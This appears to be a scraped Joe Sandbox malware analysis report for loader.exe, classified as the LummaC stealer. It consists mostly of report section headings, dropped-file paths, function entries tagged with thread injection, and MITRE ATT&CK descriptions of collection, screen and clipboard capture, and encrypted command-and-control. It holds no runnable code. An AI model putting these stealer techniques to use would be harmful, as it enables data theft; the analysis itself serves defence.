Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loader.exe_bf5bb1cb7ed6bbe96185736026b7345197bc6_d3a0ac04_c9aa6422-b519-42fe-80ae-02101ce9fdd4\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD5B9.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6A5.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6D4.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
loader.exe

Function 02A18621 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 02A1879E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 00BE2E2F Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Function 00BE06E8 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 0043CB40 Relevance: 28.9, APIs: 11, Strings: 5, Instructions: 914
memorycomCOMMON

Function 03AA1000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Function 0042FCB0 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 633
COMMON

Function 00439A02 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115
COMMON

Function 004089B0 Relevance: 7.8, APIs: 5, Instructions: 286
threadCOMMON

Function 0040D973 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 369
COMMON

Function 00425A91 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 466
COMMON

Function 00419B52 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 426
encryptionCOMMON

Function 0043759A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre